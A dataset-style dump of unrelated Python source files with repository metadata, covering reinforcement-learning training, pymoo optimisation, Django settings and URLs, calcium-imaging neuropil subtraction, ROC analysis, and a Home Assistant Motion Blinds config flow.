# REWARD_CLUSTERING can be of 4 schemes:
# - 'none': do nothing
# - 'manual:<N>:<min>:<max>': N classes between min and max
# - 'global:<N>': N classes over global min and max (as seen so far)
# - 'batch:<N>': N classes over batch min and max (as seen so far)
# TODO: quantiles discretization?
# Create the filename
if file_name == 'progress':
file_name = '%s_iw=%s_bound=%s_delta=%s_gamma=%s_center=%s_entropy=%s_seed=%s_%s' % (env.upper(), iw_method, bound, delta, gamma, center, entropy, seed, time.time())
else:
file_name = file_name
def train(env, policy, policy_init, n_episodes, horizon, seed, njobs=1, save_weights=False, **alg_args):
if env.startswith('rllab.'):
# Get env name and class
env_name = re.match('rllab.(\S+)', env).group(1)
env_rllab_class = rllab_env_from_name(env_name)
# Define env maker
def make_env():
env_rllab = env_rllab_class()
_env = Rllab2GymWrapper(env_rllab)
return _env
# Used later
env_type = 'rllab'
else:
# Normal gym, get if Atari or not.
env_type = get_env_type(env)
assert env_type is not None, "Env not recognized."
# Define the correct env maker
if env_type == 'atari':
# Atari, custom env creation
def make_env():
_env = make_atari(env)
return wrap_deepmind(_env)
else:
# Not atari, standard env creation
def make_env():
env_rllab = gym.make(env)
return env_rllab
if policy == 'linear':
hid_size = num_hid_layers = 0
elif policy == 'nn':
hid_size = [100, 50, 25]
num_hid_layers = 3
if policy_init == 'xavier':
policy_initializer = tf.contrib.layers.xavier_initializer()
elif policy_init == 'zeros':
policy_initializer = U.normc_initializer(0.0)
else:
raise Exception('Unrecognized policy initializer.')
if policy == 'linear' or policy == 'nn':
def make_policy(name, ob_space, ac_space):
return MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,
hid_size=hid_size, num_hid_layers=num_hid_layers, gaussian_fixed_var=True, use_bias=False, use_critic=False,
hidden_W_init=policy_initializer, output_W_init=policy_initializer)
elif policy == 'cnn':
def make_policy(name, ob_space, ac_space):
return CnnPolicy(name=name, ob_space=ob_space, ac_space=ac_space,
gaussian_fixed_var=True, use_bias=False, use_critic=False,
hidden_W_init=policy_initializer,
output_W_init=policy_initializer)
else:
raise Exception('Unrecognized policy type.')
sampler = ParallelSampler(make_policy, make_env, n_episodes, horizon, True, n_workers=njobs, seed=seed)
try:
affinity = len(os.sched_getaffinity(0))
except:
affinity = njobs
sess = U.make_session(affinity)
sess.__enter__()
set_global_seeds(seed)
gym.logger.setLevel(logging.WARN)
pois.learn(make_env, make_policy, n_episodes=n_episodes, horizon=horizon,
sampler=sampler, save_weights=save_weights, **alg_args)
sampler.close()
@ex.automain
def main(seed, env, num_episodes, horizon, iw_method, iw_norm, natural,
file_name, logdir, bound, delta, njobs, save_weights, policy,
policy_init, max_offline_iters, gamma, center, clipping, entropy,
max_iters, positive_return, reward_clustering, _run):
logger.configure(dir=logdir, format_strs=['stdout', 'csv', 'tensorboard', 'sacred'], file_name=file_name, run=_run)
train(env=env,
policy=policy,
policy_init=policy_init,
n_episodes=num_episodes,
horizon=horizon,
seed=seed,
njobs=njobs,
save_weights=save_weights,
max_iters=max_iters,
iw_method=iw_method,
iw_norm=iw_norm,
use_natural_gradient=natural,
bound=bound,
delta=delta,
gamma=gamma,
max_offline_iters=max_offline_iters,
center_return=center,
clipping=clipping,
entropy=entropy,
reward_clustering=reward_clustering)
|
[
"[email protected]"
] | |
b25ce7f623ec6fdde3d149c689911c96dd5e5206
|
471763d760e57f0487d5f032d261674c6fb732c8
|
/pymoo/experimental/my_test.py
|
c374176b5538cd3516ee40931e823ed8ac6f23c1
|
[
"Apache-2.0"
] |
permissive
|
s-m-amin-ghasemi/pymoo
|
7b583834d2f6dea26592001eb59e45472dadd490
|
74123484b0f72d601823bcda56f9526ad12e751a
|
refs/heads/master
| 2020-05-02T09:55:31.641675 | 2019-03-04T19:24:37 | 2019-03-04T19:24:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 799 |
py
|
from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover
from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation
from pymoo.optimize import minimize
from pymoo.util import plotting
from pymoo.util.reference_direction import UniformReferenceDirectionFactory
from pymop.factory import get_problem
problem = get_problem("dtlz1", n_var=7, n_obj=3)
ref_dirs = UniformReferenceDirectionFactory(3, n_points=91).do()
pf = problem.pareto_front(ref_dirs)
res = minimize(problem,
method='nsga3',
method_args={
'pop_size': 92,
'ref_dirs': ref_dirs},
termination=('n_gen', 400),
pf=pf,
seed=1,
disp=True)
plotting.plot(res.F)
|
[
"[email protected]"
] | |
192816a0aa4248471ba63ca120bc57733699c6ee
|
4852046aed2588c7a359c4b805251fa953399b23
|
/web/urls.py
|
bd18502d943190273fbe1e27349abd18c0f82e9d
|
[] |
no_license
|
enasmohmed/Mobily-WebSite
|
8cc11cc0e31d78da85029e8885c56b4ecc4d1e33
|
dbab598ca36ccbadb15e37199b719b618b5c11f9
|
refs/heads/master
| 2020-08-08T12:08:23.169066 | 2019-10-26T20:24:51 | 2019-10-26T20:24:51 | 213,828,626 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,532 |
py
|
"""web URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
import Run
from Run import views
app_name = 'Run'
urlpatterns = [
path('admin/', admin.site.urls),
path('', Run.views.HomePageView, name='home'),
path('', include('Run.urls', namespace='Run')),
path('accounts/', include('accounts.urls', namespace='accounts')),
path('NewProduct/', include('NewProduct.urls', namespace='NewProduct')),
path('ckeditor/', include('ckeditor_uploader.urls')),
path('contact', Run.views.ContactUs, name='contact'),
]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL ,document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL ,document_root=settings.STATIC_ROOT)
|
[
"[email protected]"
] | |
a33f00ae4c2d0a44e8d884798cff5199cbd63b9e
|
b4914b08ce57707a4f663403566b4e8e9b68d9a0
|
/hofvideos/settings.py
|
cd8023eb92ad11c2702bd1d251e7218271c4a589
|
[] |
no_license
|
Harshvartak/halloffamevids
|
9d47521ac9cafbcc1bbb8f049e64765d300bbf6c
|
89bd7d3890feecd67ba293b0ab8d62ced491d025
|
refs/heads/master
| 2022-12-09T10:57:47.856072 | 2019-09-26T19:31:56 | 2019-09-26T19:31:56 | 211,171,960 | 0 | 0 | null | 2022-12-08T06:38:36 | 2019-09-26T20:02:38 |
JavaScript
|
UTF-8
|
Python
| false | false | 3,326 |
py
|
"""
Django settings for hofvideos project.
Generated by 'django-admin startproject' using Django 2.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '198eoywsu)$@msv6jhixb$%tc3ruj83aq()oloy39(eiaw1za2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL= 'dashboard'
LOGOUT_REDIRECT_URL= 'home'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'halls',
'widget_tweaks',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hofvideos.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hofvideos.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT= os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_ROOT=os.path.join(BASE_DIR, 'media')
MEDIA_URL='/media/'
|
[
"[email protected]"
] | |
825e5b112be413802be4e582a733b67f276cf6ad
|
1ceb35da7b1106a4da4e8a3a5620d23a326a68e4
|
/corticalmapping/scripts/post_recording/00_old/movie_multi_plane_single_channel_deepscope/within_plane_folder/090_get_neuropil_subtracted_traces.py
|
551768f06dbf818c36c61b57bb1068b0fc1d1578
|
[] |
no_license
|
zhuangjun1981/corticalmapping
|
c3870a3f31ed064d77f209a08e71f44c375676a3
|
0ddd261b3993f5ce5608adfbd98a588afc56d20c
|
refs/heads/master
| 2022-11-14T03:24:53.443659 | 2020-07-13T23:48:50 | 2020-07-13T23:48:50 | 84,975,797 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,204 |
py
|
import sys
import os
import h5py
import numpy as np
import corticalmapping.HighLevel as hl
import corticalmapping.core.FileTools as ft
import matplotlib.pyplot as plt
lam = 1. # 100.
plot_chunk_size = 5000
def plot_traces_chunks(traces, labels, chunk_size, roi_ind):
"""
:param traces: np.array, shape=[trace_type, t_num]
:param labels:
:param chunk_size:
:param figures_folder:
:param roi_ind:
:return:
"""
t_num = traces.shape[1]
chunk_num = t_num // chunk_size
chunks = []
for chunk_ind in range(chunk_num):
chunks.append([chunk_ind * chunk_size, (chunk_ind + 1) * chunk_size])
if t_num % chunk_size != 0:
chunks.append([chunk_num * chunk_size, t_num])
v_max = np.amax(traces)
v_min = np.amin(traces)
fig = plt.figure(figsize=(75, 20))
fig.suptitle('neuropil subtraction for ROI: {}'.format(roi_ind))
for chunk_ind, chunk in enumerate(chunks):
curr_ax = fig.add_subplot(len(chunks), 1, chunk_ind + 1)
for trace_ind in range(traces.shape[0]):
curr_ax.plot(traces[trace_ind, chunk[0]: chunk[1]], label=labels[trace_ind])
curr_ax.set_xlim([0, chunk_size])
curr_ax.set_ylim([v_min, v_max * 1.2])
curr_ax.legend()
return fig
curr_folder = os.path.dirname(os.path.realpath(__file__))
os.chdir(curr_folder)
data_f = h5py.File('rois_and_traces.hdf5')
traces_raw = data_f['traces_center_raw'].value
traces_srround = data_f['traces_surround_raw'].value
traces_subtracted = np.zeros(traces_raw.shape, np.float32)
ratio = np.zeros(traces_raw.shape[0], np.float32)
err = np.zeros(traces_raw.shape[0], np.float32)
for i in range(traces_raw.shape[0]):
curr_trace_c = traces_raw[i]
curr_trace_s = traces_srround[i]
curr_r, curr_err, curr_trace_sub = hl.neural_pil_subtraction(curr_trace_c, curr_trace_s, lam=lam)
print "roi_%s \tr = %.4f; error = %.4f." % (ft.int2str(i, 5), curr_r, curr_err)
traces_subtracted[i] = curr_trace_sub
ratio[i] = curr_r
err[i] = curr_err
print('\nplotting neuropil subtraction results ...')
figures_folder = 'figures/neuropil_subtraction_lam_{}'.format(lam)
if not os.path.isdir(figures_folder):
os.makedirs(figures_folder)
for roi_ind in range(traces_raw.shape[0]):
print('roi_{:04d}'.format(roi_ind))
curr_traces = np.array([traces_raw[roi_ind], traces_srround[roi_ind], traces_subtracted[roi_ind]])
curr_fig = plot_traces_chunks(traces=curr_traces,
labels=['center', 'surround', 'subtracted'],
chunk_size=plot_chunk_size,
roi_ind=roi_ind)
curr_fig.savefig(os.path.join(figures_folder, 'neuropil_subtraction_ROI_{:04d}.png'.format(roi_ind)))
curr_fig.clear()
plt.close(curr_fig)
# wait for keyboard abortion
msg = raw_input('Do you want to save? (y/n)\n')
while True:
if msg == 'y':
break
elif msg == 'n':
sys.exit('Stop process without saving.')
else:
msg = raw_input('Do you want to save? (y/n)\n')
data_f['traces_center_subtracted'] = traces_subtracted
data_f['neuropil_r'] = ratio
data_f['neuropil_err'] = err
data_f.close()
|
[
"[email protected]"
] | |
bf50004145bd6d307ec066d1ad0794c4877ad04b
|
849f05421d6becc6c9da70cb077dc356c3b4af0b
|
/addphoto/migrations/0002_auto_20200301_1602.py
|
1aa115012e6672cc5efaab5d54635095ea376dff
|
[] |
no_license
|
microStationCorp/faceshot
|
63d632ff07b71c24b65577c926a28beb0e6ebd89
|
451e1a19f56a0da84f6290b2d6d15c0d8e60cb92
|
refs/heads/master
| 2021-02-06T20:08:35.427105 | 2020-03-03T07:16:25 | 2020-03-03T07:16:25 | 243,944,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 410 |
py
|
# Generated by Django 3.0.3 on 2020-03-01 10:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('addphoto', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='uploadedphoto',
name='image',
field=models.ImageField(max_length=1, upload_to='get_image_path'),
),
]
|
[
"[email protected]"
] | |
7d503436d2d772f337fa170b88ce13e1e6d851f4
|
d87483a2c0b50ed97c1515d49d62c6e9feaddbe0
|
/.history/buy_top_fc_smart_20210204001749.py
|
e28c6f69964eb4311396f03581510b45098e4b0e
|
[
"MIT"
] |
permissive
|
HopperKremer/hoptrader
|
0d36b6e33922414003cf689fb81f924da076a54b
|
406793c10bc888648290fd15c7c2af62cf8c6c67
|
refs/heads/main
| 2023-06-12T15:51:00.910310 | 2021-07-06T16:15:41 | 2021-07-06T16:15:41 | 334,754,936 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,730 |
py
|
# Buy top tickers from Financhill
import requests
from tda import auth, client
from tda.orders.equities import equity_buy_market, equity_buy_limit
from tda.orders.common import Duration, Session
import tda
import os, sys
import time
from selenium import webdriver
import json
currentdir = os.path.dirname(os.path.realpath(__file__))
parentdir = os.path.dirname(currentdir)
sys.path.append(parentdir)
import config # stored in parent directory for security
token_path = "token"
DRIVER_PATH = "/home/hopper/chromedriver"
driver = webdriver.Chrome(DRIVER_PATH)
redirect_uri = "https://localhost"
try:
c = auth.client_from_token_file(token_path, config.api_key)
except FileNotFoundError:
c = auth.client_from_login_flow(driver, config.api_key, redirect_uri, token_path)
# All this scraping code works
driver.get("https://financhill.com/screen/stock-score")
time.sleep(2)
driver.find_element_by_css_selector(
'span[data-sort-name="stock_score_normalized"]'
).click()
time.sleep(2)
tickers = driver.find_elements_by_tag_name("td")
positions = c.get_account(config.tda_acct_num, c.Account.Fields.POSITIONS)
print(positions)
# i = 0
# [0]:Ticker, [1]:Share Price, [2]:Rating, [3]:Score, [4]:Rating Change Date, [5]:Price Change %
# while i < 40:
# print(len(tickers))
# ticker = str(tickers[i].text)
# print(ticker)
# share_price = float(tickers[i + 1].text)
# # How many dollars of each stock to buy:
# desired_dollar_amount = 1000
# num_shares = round(desired_dollar_amount / share_price)
# print(num_shares)
# order = equity_buy_market(ticker, 1)
# r = c.place_order(config.tda_acct_num, order)
# time.sleep(2)
# print(r.status_code)
# i += 10
driver.quit()
|
[
"[email protected]"
] | |
aebd77ff3c559266ef4a5dce4c44cbc2bda85af3
|
ce972e94fcdf19d6809d94c2a73595233d1f741d
|
/catkin_ws/build/turtlebot_gazebo/catkin_generated/pkg.develspace.context.pc.py
|
76fa70e69fef0fcfde19f495cc341709a0f0e080
|
[] |
no_license
|
WilliamZipanHe/reward_shaping_ttr
|
cfa0e26579f31837c61af3e09621b4dad7eaaba2
|
df56cc0153147bb067bc3a0eee0e1e4e1044407f
|
refs/heads/master
| 2022-02-23T05:02:00.120626 | 2019-08-07T21:52:50 | 2019-08-07T21:52:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 410 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot_gazebo"
PROJECT_SPACE_DIR = "/local-scratch/xlv/catkin_ws/devel/.private/turtlebot_gazebo"
PROJECT_VERSION = "2.2.3"
|
[
"[email protected]"
] | |
3484f514f3efa0f801ae3310b219f4923b7b871b
|
a98899845ed5dc112f50e2824082c8dc49941ed8
|
/project/api/migrations/0033_session_is_invitational.py
|
824057127393ceff2fd50eef9202d4ffbb3b6438
|
[
"BSD-2-Clause"
] |
permissive
|
talexb/barberscore-api
|
9d6c48eca5233b530e2c02251b004b0b1d72c429
|
2320a75d9b49368f5eb1e00e5e5f32f5c79484a1
|
refs/heads/master
| 2021-01-15T11:57:34.970439 | 2017-08-07T14:42:57 | 2017-08-07T14:42:57 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 456 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-18 03:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0032_person_last_name'),
]
operations = [
migrations.AddField(
model_name='session',
name='is_invitational',
field=models.BooleanField(default=False),
),
]
|
[
"[email protected]"
] | |
81e6a970b801ccc37420106f206135876a43bc0c
|
108cc1350623d1a30c3e08f357267e516f254ae9
|
/test/test_sgd_classifier.py
|
245f73242df189c623eae7a1182296f5e0ab0fdb
|
[
"CC-BY-SA-4.0",
"Apache-2.0"
] |
permissive
|
agoyal3/cs224u
|
1afd02948f5abb08636d599c4a9266c2cb5d7447
|
f565857a79f09be1b8cfb5c76f8d5731e159939f
|
refs/heads/master
| 2023-08-11T21:15:25.947141 | 2021-09-24T07:05:05 | 2021-09-24T07:05:05 | 401,109,252 | 0 | 0 |
Apache-2.0
| 2021-09-07T20:49:11 | 2021-08-29T18:04:38 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,453 |
py
|
import pytest
from sklearn.datasets import load_digits
from sklearn.metrics import accuracy_score
from sklearn.model_selection import RandomizedSearchCV, cross_validate
from sklearn.model_selection import train_test_split
import utils
from np_sgd_classifier import BasicSGDClassifier
from np_sgd_classifier import simple_example
__author__ = "Christopher Potts"
__version__ = "CS224u, Stanford, Spring 2021"
utils.fix_random_seeds()
PARAMS_WITH_TEST_VALUES = [
['max_iter', 10],
['max_iter', 0],
['eta', 0.02]]
@pytest.fixture
def digits():
digits = load_digits()
X = digits.data
y = digits.target
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.33, random_state=42)
return X_train, X_test, y_train, y_test
def test_model():
f1 = simple_example()
assert f1 >= 0.89
@pytest.mark.parametrize("param, expected", PARAMS_WITH_TEST_VALUES)
def test_params(param, expected):
mod = BasicSGDClassifier(**{param: expected})
result = getattr(mod, param)
assert result == expected
@pytest.mark.parametrize("param, expected", PARAMS_WITH_TEST_VALUES)
def test_simple_example_params(digits, param, expected):
X_train, X_test, y_train, y_test = digits
mod = BasicSGDClassifier(**{param: expected})
mod.fit(X_train, y_train)
preds = mod.predict(X_test)
acc = accuracy_score(y_test, preds)
if not (param == "max_iter" and expected <= 1):
assert acc >= 0.90
@pytest.mark.parametrize("param, expected", PARAMS_WITH_TEST_VALUES)
def test_parameter_setting(param, expected):
mod = BasicSGDClassifier()
mod.set_params(**{param: expected})
result = getattr(mod, param)
assert result == expected
def test_hyperparameter_selection(digits):
X_train, X_test, y_train, y_test = digits
param_grid = {'eta': [0.02, 0.03]}
mod = BasicSGDClassifier(max_iter=5)
xval = RandomizedSearchCV(mod, param_grid, cv=2)
xval.fit(X_train, y_train)
def test_cross_validation_sklearn(digits):
X_train, X_test, y_train, y_test = digits
mod = BasicSGDClassifier(max_iter=5)
xval = cross_validate(mod, X_train, y_train, cv=2)
def test_cross_validation_nlu(digits):
X_train, X_test, y_train, y_test = digits
param_grid = {'eta': [0.02, 0.03]}
mod = BasicSGDClassifier(max_iter=2)
best_mod = utils.fit_classifier_with_hyperparameter_search(
X_train, y_train, mod, cv=2, param_grid=param_grid)
|
[
"[email protected]"
] | |
b947ef80ac45577d2b326521537502f06ee36992
|
c981bbd7434b814f7968b9ba0e2235f82d7874b4
|
/Modellbewertung und Hyperparamter-Abstimmung/roc_curve.py
|
965aee0f54da0a3269c211ea4d38a0b7714aeadd
|
[] |
no_license
|
foxriver76/MachineLearningRaschka
|
e1ef187f5b2b7b9d8f4edf834451e1aa5f6b9d70
|
a2940fa6c187a5223fcc789d8a7f1ccb5d7dc3e2
|
refs/heads/master
| 2021-03-27T11:53:44.684929 | 2018-05-13T09:03:20 | 2018-05-13T09:03:20 | 104,927,632 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,194 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 31 12:13:57 2017
@author: moritz
"""
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler, LabelEncoder
from sklearn.model_selection import train_test_split, StratifiedKFold
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve, auc, roc_auc_score, accuracy_score, \
make_scorer, precision_score
from scipy import interp
from sklearn.decomposition import PCA
from sklearn.linear_model import LogisticRegression
import numpy as np
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-' \
'databases/breast-cancer-wisconsin/wdbc.data', header=None)
X = df.loc[:, 2:].values
y = df.loc[:, 1].values
le = LabelEncoder()
y = le.fit_transform(y)
X_train, X_test, y_train, y_test = \
train_test_split(X, y, test_size=0.2, random_state=1)
"""Logistic Regression Pipeline"""
pipe_lr = Pipeline([('scl', StandardScaler()),
('pca', PCA(n_components=2)),
('clf', LogisticRegression(penalty='l2',
random_state=0,
C=100.0))])
X_train2 = X_train[:, [4, 14]]
cv = list(StratifiedKFold(n_splits=3,
random_state=1).split(X_train, y_train))
fig = plt.figure(figsize=(7, 5))
mean_tpr = 0.0
mean_fpr = np.linspace(0, 1, 100)
all_tpr = []
for i, (train, test) in enumerate(cv):
probas = pipe_lr.fit(X_train2[train],
y_train[train]).predict_proba(X_train2[test])
fpr, tpr, thresholds = roc_curve(y_train[test],
probas[:, 1],
pos_label=1)
mean_tpr += interp(mean_fpr, fpr, tpr)
mean_tpr[0] = 0.0
roc_auc = auc(fpr, tpr)
plt.plot(fpr,
tpr,
lw=1,
label='ROC-Teilmenge %d (Fläche = %0.2f)'
% (i+1, roc_auc))
plt.plot([0,1],
[0, 1],
linestyle='--',
color = (0.6, 0.6, 0.6),
label='Zufälliges Raten')
mean_tpr /= len(cv)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
plt.plot(mean_fpr, mean_tpr, 'k--',
label='Mittelwert ROC (Fläche = %0.2f)'
% mean_auc, lw=2)
plt.plot([0, 0, 1],
[0, 1, 1],
lw=2,
linestyle=':',
color='black',
label='Perfektes Ergebnis')
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('Falsch-Positiv-Rate')
plt.ylabel('Richtig-Positiv-Rate')
plt.title('Receiver Operator Chararcteristic')
plt.legend(loc='lower right')
plt.show()
"""Wenn nur ROC Fläche interessant, dann:"""
pipe_lr = pipe_lr.fit(X_train2, y_train)
y_pred2 = pipe_lr.predict(X_test[:, [4, 14]])
print('ROC AUC: %.3f'
% roc_auc_score(y_true=y_test, y_score=y_pred2))
print('Korrektklassifizierungsrate: %.3f'
% accuracy_score(y_true=y_test, y_pred=y_pred2))
"""Für Multiklassen-Klassifizierung:"""
pre_scorer = make_scorer(score_func=precision_score,
pos_label=1,
greater_is_better=True,
average='micro')
|
[
"[email protected]"
] | |
5c1b7a79524ef0a7a58892297255840adff3bca9
|
aa13e1d93b7a8017e1e610a900bd05f6df91604f
|
/codechef/contests/APRIL17/SMARKET/test.py
|
9ce7c7e4717b87e49c329c52f811ca151af5949b
|
[] |
no_license
|
laveesingh/Competitive-Programming
|
3ce3272eab525635f9ce400f7467ee09de8b51df
|
41047f47c23bc8572a1891e891a03cc3f751e588
|
refs/heads/master
| 2021-01-24T09:51:00.332543 | 2017-10-30T17:11:48 | 2017-10-30T17:11:48 | 52,956,650 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
import random
def case():
q = random.randint(1,100000)
a = []
for i in xrange(random.randint(1,10000)):
a.extend([random.randint(1,30)]*random.randint(1,15))
n = len(a)
print n,q
for s in a: print s,
print
for i in xrange(q):
x = random.randint(1,n)
y = random.randint(x,n)
z = random.randint(1,6)
print x,y,z
t = 1
print t
for _ in xrange(t):
case()
|
[
"[email protected]"
] | |
bc515c0993495b2e5a539a3fda11dd20316f2e87
|
fe3265b72e691c6df8ecd936c25b6d48ac33b59a
|
/homeassistant/components/motion_blinds/config_flow.py
|
d861c989ee0e2c19d2a4eef6e23cd33e93f2c8c3
|
[
"Apache-2.0"
] |
permissive
|
bdraco/home-assistant
|
dcaf76c0967783a08eec30ce704e5e9603a2f0ca
|
bfa315be51371a1b63e04342a0b275a57ae148bd
|
refs/heads/dev
| 2023-08-16T10:39:15.479821 | 2023-02-21T22:38:50 | 2023-02-21T22:38:50 | 218,684,806 | 13 | 7 |
Apache-2.0
| 2023-02-21T23:40:57 | 2019-10-31T04:33:09 |
Python
|
UTF-8
|
Python
| false | false | 6,137 |
py
|
"""Config flow to configure Motion Blinds using their WLAN API."""
from __future__ import annotations
from typing import Any
from motionblinds import MotionDiscovery
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import dhcp
from homeassistant.const import CONF_API_KEY, CONF_HOST
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.device_registry import format_mac
from .const import (
CONF_INTERFACE,
CONF_WAIT_FOR_PUSH,
DEFAULT_GATEWAY_NAME,
DEFAULT_INTERFACE,
DEFAULT_WAIT_FOR_PUSH,
DOMAIN,
)
from .gateway import ConnectMotionGateway
CONFIG_SCHEMA = vol.Schema(
{
vol.Optional(CONF_HOST): str,
}
)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Options for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Init object."""
self.config_entry = config_entry
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Manage the options."""
errors: dict[str, str] = {}
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
settings_schema = vol.Schema(
{
vol.Optional(
CONF_WAIT_FOR_PUSH,
default=self.config_entry.options.get(
CONF_WAIT_FOR_PUSH, DEFAULT_WAIT_FOR_PUSH
),
): bool,
}
)
return self.async_show_form(
step_id="init", data_schema=settings_schema, errors=errors
)
class MotionBlindsFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a Motion Blinds config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize the Motion Blinds flow."""
self._host: str | None = None
self._ips: list[str] = []
self._config_settings = None
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> OptionsFlowHandler:
"""Get the options flow."""
return OptionsFlowHandler(config_entry)
async def async_step_dhcp(self, discovery_info: dhcp.DhcpServiceInfo) -> FlowResult:
"""Handle discovery via dhcp."""
mac_address = format_mac(discovery_info.macaddress).replace(":", "")
await self.async_set_unique_id(mac_address)
self._abort_if_unique_id_configured(updates={CONF_HOST: discovery_info.ip})
short_mac = mac_address[-6:].upper()
self.context["title_placeholders"] = {
"short_mac": short_mac,
"ip_address": discovery_info.ip,
}
self._host = discovery_info.ip
return await self.async_step_connect()
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a flow initialized by the user."""
errors = {}
if user_input is not None:
self._host = user_input.get(CONF_HOST)
if self._host is not None:
return await self.async_step_connect()
# Use MotionGateway discovery
discover_class = MotionDiscovery()
gateways = await self.hass.async_add_executor_job(discover_class.discover)
self._ips = list(gateways)
if len(self._ips) == 1:
self._host = self._ips[0]
return await self.async_step_connect()
if len(self._ips) > 1:
return await self.async_step_select()
errors["base"] = "discovery_error"
return self.async_show_form(
step_id="user", data_schema=CONFIG_SCHEMA, errors=errors
)
async def async_step_select(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle multiple motion gateways found."""
if user_input is not None:
self._host = user_input["select_ip"]
return await self.async_step_connect()
